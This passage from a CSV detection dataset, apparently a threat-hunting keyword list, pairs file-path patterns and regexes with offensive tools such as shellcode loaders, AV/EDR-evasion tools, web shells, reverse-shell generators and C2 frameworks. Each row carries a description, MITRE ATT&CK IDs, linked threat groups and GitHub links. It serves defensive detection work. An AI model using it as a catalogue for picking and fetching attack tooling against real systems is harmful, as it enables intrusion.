LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","1","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","11186" "*/shellcode.hex*",".{0,1000}\/shellcode\.hex.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway","T1548.002 - T1134.001 - T1087.002 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1059.006 - T1543.003 - T1555.003 - T1555.004 - T1546.001 - T1546.003 - T1546.015 - T1041 - T1083 - T1564.003 - T1562.001 - T1562.003 - T1070 - T1070.004 - T1105 - T1056.001 - T1056.002 - T1556 - T1112 - T1106 - T1046 - T1135 - T1003.001 - T1069.001 - T1069.002 - T1057 - T1055 - T1012 - T1021.003 - T1021.006 - T1018 - T1113 - T1518.001 - T1558.003 - T1082 - T1033 - T1007 - T1124 - T1552.006 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","N/A","10","2239","416","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z","11187" "*/shellcode.hpp*",".{0,1000}\/shellcode\.hpp.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - 
T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","1","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","11188" "*/shellcode.sgn*",".{0,1000}\/shellcode\.sgn.{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used in to obfuscate payloads","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/EgeBalci/sgn","1","0","#linux","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","11189" "*/shellcode_callback.exe*",".{0,1000}\/shellcode_callback\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","11190" "*/shellcode_excel*",".{0,1000}\/shellcode_excel.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. 
The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","11191" "*/shellcode_generate.py*",".{0,1000}\/shellcode_generate\.py.{0,1000}","offensive_tool_keyword","canisrufus","A stealthy Python based Windows backdoor that uses Github as a command and control server","T1105 - T1071 - T1027","TA0003 - TA0011 - TA0005 - TA0010","N/A","Black Basta","C2","https://github.com/maldevel/canisrufus","1","1","N/A","N/A","10","10","263","78","2017-08-15T15:46:20Z","2017-08-12T06:49:40Z","11192" "*/ShellCode_Loader*",".{0,1000}\/ShellCode_Loader.{0,1000}","offensive_tool_keyword","cobaltstrike","ShellCode_Loader - Msf&CobaltStrike Antivirus ShellCode loader. Shellcode_encryption - Antivirus Shellcode encryption generation tool. 
currently tested for Antivirus 360 & Huorong & Computer Manager & Windows Defender (other antivirus software not tested).","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Axx8/ShellCode_Loader","1","1","N/A","N/A","10","10","412","47","2022-09-20T07:24:25Z","2022-09-02T14:41:18Z","11193" "*/shellcode_samples/*",".{0,1000}\/shellcode_samples\/.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource 
Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","11194" "*/shellcode_sources/*",".{0,1000}\/shellcode_sources\/.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","11195" "*/shellcode2vba.py*",".{0,1000}\/shellcode2vba\.py.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","11196" "*/shellcode2vbafunc.py*",".{0,1000}\/shellcode2vbafunc\.py.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","11197" "*/ShellcodeFluctuation*",".{0,1000}\/ShellcodeFluctuation.{0,1000}","offensive_tool_keyword","C2 related tools","An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - 
T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ShellcodeFluctuation","1","1","N/A","N/A","10","10","1012","160","2022-06-17T18:07:33Z","2021-09-29T10:24:52Z","11198" "*/Shellcode-Hide.git*",".{0,1000}\/Shellcode\-Hide\.git.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","N/A","9","5","416","109","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z","11199" "*/SHELLCODELOADER*",".{0,1000}\/SHELLCODELOADER.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","11200" "*/Shellcode-Loader.git*",".{0,1000}\/Shellcode\-Loader\.git.{0,1000}","offensive_tool_keyword","Shellcode-Loader","dynamic shellcode loading","T1055 - T1055.012 - T1027 - T1027.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ReversingID/Shellcode-Loader","1","1","N/A","N/A","10","3","244","44","2025-01-25T16:30:56Z","2021-08-08T08:53:03Z","11201" 
"*/shellcodes/utils.py*",".{0,1000}\/shellcodes\/utils\.py.{0,1000}","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","Black Basta","C2","https://github.com/chrispetrou/HRShell","1","1","N/A","N/A","10","10","247","70","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z","11202" "*/shellcodetester*",".{0,1000}\/shellcodetester.{0,1000}","offensive_tool_keyword","shellcodetester","This tools test generated ShellCodes","T1059.003 - T1059.005 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","Resource Development","https://github.com/helviojunior/shellcodetester","1","1","N/A","N/A","N/A","1","92","30","2024-11-06T00:48:22Z","2019-06-11T04:39:58Z","11203" "*/shellcode-xor.py*",".{0,1000}\/shellcode\-xor\.py.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","1","N/A","N/A","10","9","804","128","2024-07-02T10:24:43Z","2023-04-08T16:29:52Z","11204" "*/ShellGen.git*",".{0,1000}\/ShellGen\.git.{0,1000}","offensive_tool_keyword","ShellGen","PowerShell script to generate ShellCode in various formats","T1059.001 - T1588","TA0042","N/A","N/A","Resource Development","https://github.com/Leo4j/ShellGen","1","1","N/A","N/A","7","1","41","10","2024-09-25T09:29:13Z","2024-08-22T13:32:06Z","11205" "*/ShellGen.ps1*",".{0,1000}\/ShellGen\.ps1.{0,1000}","offensive_tool_keyword","ShellGen","PowerShell script to generate ShellCode in various formats","T1059.001 - T1588","TA0042","N/A","N/A","Resource Development","https://github.com/Leo4j/ShellGen","1","1","N/A","N/A","7","1","41","10","2024-09-25T09:29:13Z","2024-08-22T13:32:06Z","11206" "*/ShellGhost.git*",".{0,1000}\/ShellGhost\.git.{0,1000}","offensive_tool_keyword","ShellGhost","A memory-based evasion technique 
which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","N/A","10","1175","140","2023-10-16T06:40:24Z","2023-07-01T16:56:58Z","11207" "*/shellinject*",".{0,1000}\/shellinject.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","11208" "*/ShellPop*",".{0,1000}\/ShellPop.{0,1000}","offensive_tool_keyword","ShellPop","Shellpop is all about popping shells. With this tool you can generate easy and sophisticated reverse or bind shell commands to help you during penetration tests.","T1059 - T1574 - T1055 - T1021","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/0x00-0x00/ShellPop","1","0","N/A","N/A","N/A","10","1458","237","2019-04-02T14:53:19Z","2018-03-08T03:58:00Z","11209" "*/ShellPwnsh.git*",".{0,1000}\/ShellPwnsh\.git.{0,1000}","offensive_tool_keyword","ShellPwnsh","Reverse Shell in Golang and PowerShell Fud","T1059.001 - T1573.002 - T1105","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/BlackShell256/ShellPwnsh","1","1","N/A","N/A","9","10","9","6","2022-05-01T08:42:54Z","2022-04-28T01:26:08Z","11210" "*/Shells/shell.aspx*",".{0,1000}\/Shells\/shell\.aspx.{0,1000}","offensive_tool_keyword","pyshell","PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. 
Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.","T1059.001 - T1059.002 - T1059.005 - T1059.007","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tool","https://github.com/JoelGMSec/PyShell","1","1","N/A","N/A","N/A","4","309","60","2024-09-27T11:11:56Z","2021-10-19T07:49:17Z","11211" "*/Shells/shell.jsp*",".{0,1000}\/Shells\/shell\.jsp.{0,1000}","offensive_tool_keyword","pyshell","PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.","T1059.001 - T1059.002 - T1059.005 - T1059.007","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tool","https://github.com/JoelGMSec/PyShell","1","1","N/A","N/A","N/A","4","309","60","2024-09-27T11:11:56Z","2021-10-19T07:49:17Z","11212" "*/Shells/shell.php*",".{0,1000}\/Shells\/shell\.php.{0,1000}","offensive_tool_keyword","pyshell","PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.","T1059.001 - T1059.002 - T1059.005 - T1059.007","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tool","https://github.com/JoelGMSec/PyShell","1","1","N/A","N/A","N/A","4","309","60","2024-09-27T11:11:56Z","2021-10-19T07:49:17Z","11213" "*/Shells/shell.py*",".{0,1000}\/Shells\/shell\.py.{0,1000}","offensive_tool_keyword","pyshell","PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. 
Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.","T1059.001 - T1059.002 - T1059.005 - T1059.007","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tool","https://github.com/JoelGMSec/PyShell","1","1","N/A","N/A","N/A","4","309","60","2024-09-27T11:11:56Z","2021-10-19T07:49:17Z","11214" "*/Shells/shell.sh*",".{0,1000}\/Shells\/shell\.sh.{0,1000}","offensive_tool_keyword","pyshell","PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.","T1059.001 - T1059.002 - T1059.005 - T1059.007","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tool","https://github.com/JoelGMSec/PyShell","1","1","N/A","N/A","N/A","4","309","60","2024-09-27T11:11:56Z","2021-10-19T07:49:17Z","11215" "*/Shells/tomcat.war*",".{0,1000}\/Shells\/tomcat\.war.{0,1000}","offensive_tool_keyword","pyshell","PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.","T1059.001 - T1059.002 - T1059.005 - T1059.007","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tool","https://github.com/JoelGMSec/PyShell","1","1","N/A","N/A","N/A","4","309","60","2024-09-27T11:11:56Z","2021-10-19T07:49:17Z","11216" "*/Shells/wordpress.zip*",".{0,1000}\/Shells\/wordpress\.zip.{0,1000}","offensive_tool_keyword","pyshell","PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. 
Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.","T1059.001 - T1059.002 - T1059.005 - T1059.007","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tool","https://github.com/JoelGMSec/PyShell","1","1","N/A","N/A","N/A","4","309","60","2024-09-27T11:11:56Z","2021-10-19T07:49:17Z","11217" "*/ShellServe.git*",".{0,1000}\/ShellServe\.git.{0,1000}","offensive_tool_keyword","ShellServe","Multi-client network fileserver with integrated shell functionality crafted in C using system calls for efficient and direct file and command processing","T1059 - T1505 - T1046 - T1569","TA0002 - TA0007 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/7etsuo/ShellServe","1","1","N/A","N/A","6","1","N/A","N/A","N/A","N/A","11218" "*/shellshock.py*",".{0,1000}\/shellshock\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","11219" "*/shellsilo.git*",".{0,1000}\/shellsilo\.git.{0,1000}","offensive_tool_keyword","shellsilo","cutting-edge tool that translates C syntax into syscall assembly and its corresponding shellcode","T1500 - T1588.002 - T1587.001 - T1546.015","TA0005 - TA0042","N/A","N/A","Resource Development","https://github.com/nixpal/shellsilo","1","1","N/A","N/A","6","2","132","13","2024-11-08T03:16:57Z","2024-03-08T02:04:04Z","11220" "*/shellsilo.py*",".{0,1000}\/shellsilo\.py.{0,1000}","offensive_tool_keyword","shellsilo","cutting-edge tool that translates C syntax into syscall assembly and its corresponding shellcode","T1500 - T1588.002 - T1587.001 - T1546.015","TA0005 - TA0042","N/A","N/A","Resource 
Development","https://github.com/nixpal/shellsilo","1","1","N/A","N/A","6","2","132","13","2024-11-08T03:16:57Z","2024-03-08T02:04:04Z","11221" "*/ShellSync.git*",".{0,1000}\/ShellSync\.git.{0,1000}","offensive_tool_keyword","ShellSync","exposing a server with suspicious scripts and executable from I-Am-Jakoby","T1059.003 - T1100 - T1027","TA0005 - TA0009 - TA0011 ","N/A","N/A","Data Exfiltration","https://github.com/I-Am-Jakoby/ShellSync","1","1","N/A","N/A","5","1","20","7","2023-11-08T18:01:18Z","2023-11-06T06:05:11Z","11222" "*/ShellSync-main.zip*",".{0,1000}\/ShellSync\-main\.zip.{0,1000}","offensive_tool_keyword","ShellSync","exposing a server with suspicious scripts and executable from I-Am-Jakoby","T1059.003 - T1100 - T1027","TA0005 - TA0009 - TA0011 ","N/A","N/A","Data Exfiltration","https://github.com/I-Am-Jakoby/ShellSync","1","1","N/A","N/A","5","1","20","7","2023-11-08T18:01:18Z","2023-11-06T06:05:11Z","11223" "*/sherlocksecurity/*",".{0,1000}\/sherlocksecurity\/.{0,1000}","offensive_tool_keyword","POC","POC and exploit tools on github","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tool","https://github.com/sherlocksecurity","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11224" "*/Shhhavoc.py*",".{0,1000}\/Shhhavoc\.py.{0,1000}","offensive_tool_keyword","Shhhloader","shellcode loader that compiles a C++ stub to bypass AV/EDR","T1027 - T1055 - T1140 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/icyguider/Shhhloader","1","1","N/A","N/A","9","10","1186","191","2024-05-08T20:24:35Z","2021-09-28T16:52:24Z","11225" "*/Shhhloader.git*",".{0,1000}\/Shhhloader\.git.{0,1000}","offensive_tool_keyword","Shhhloader","shellcode loader that compiles a C++ stub to bypass AV/EDR","T1027 - T1055 - T1140 - T1218","TA0005 - TA0002","N/A","N/A","Defense 
Evasion","https://github.com/icyguider/Shhhloader","1","1","N/A","N/A","9","10","1186","191","2024-05-08T20:24:35Z","2021-09-28T16:52:24Z","11226" "*/Shhmon.exe*",".{0,1000}\/Shhmon\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","11227" "*/Shhmon.exe*",".{0,1000}\/Shhmon\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","11228" "*/Shhmon.exe*",".{0,1000}\/Shhmon\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","11229" "*/Shhmon/*",".{0,1000}\/Shhmon\/.{0,1000}","offensive_tool_keyword","shhmon","Neutering Sysmon via driver unload","T1518.001 ","TA0007","N/A","N/A","Defense Evasion","https://github.com/matterpreter/Shhmon","1","1","N/A","N/A","N/A","3","228","37","2022-10-13T16:56:41Z","2019-09-12T14:13:19Z","11230" "*/ShimDB.git*",".{0,1000}\/ShimDB\.git.{0,1000}","offensive_tool_keyword","ShimDB","Shim database persistence (Fin7 TTP)","T1546.011","TA0003","N/A","N/A","Persistence","https://github.com/jackson5sec/ShimDB","1","1","N/A","N/A","9","1","37","10","2020-02-25T09:41:53Z","2018-06-21T00:38:10Z","11231" "*/ShimInjector.exe*",".{0,1000}\/ShimInjector\.exe.{0,1000}","offensive_tool_keyword","ShimMe","Injects a DLL into a suspended process running as SYSTEM via the OfficeClickToRun service for privilege escalation - Shim Injector: Injects a DLL into a process by modifying shim data in memory without creating or registering new SDB files to evade detection.","T1055 - T1053 - T1548.002 - T1078 - T1546 - T1070","TA0004 - TA0005 - TA0006 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/ShimMe","1","0","N/A","N/A","9","2","140","20","2024-10-29T07:33:38Z","2024-08-04T10:03:28Z","11232" "*/ShimMe.git*",".{0,1000}\/ShimMe\.git.{0,1000}","offensive_tool_keyword","ShimMe","Injects a DLL into a suspended process running as SYSTEM 
via the OfficeClickToRun service for privilege escalation - Shim Injector: Injects a DLL into a process by modifying shim data in memory without creating or registering new SDB files to evade detection.","T1055 - T1053 - T1548.002 - T1078 - T1546 - T1070","TA0004 - TA0005 - TA0006 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/ShimMe","1","1","N/A","N/A","9","2","140","20","2024-10-29T07:33:38Z","2024-08-04T10:03:28Z","11233" "*/ShimsInstaller.*",".{0,1000}\/ShimsInstaller\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","11234" "*/ShInject.exe*",".{0,1000}\/ShInject\.exe.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","1","N/A","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","11235" "*/shocknawe/*",".{0,1000}\/shocknawe\/.{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","1","N/A","N/A","N/A","1","72","9","2024-06-05T14:56:28Z","2021-11-04T15:30:12Z","11236" "*/shodan-api.nse*",".{0,1000}\/shodan\-api\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
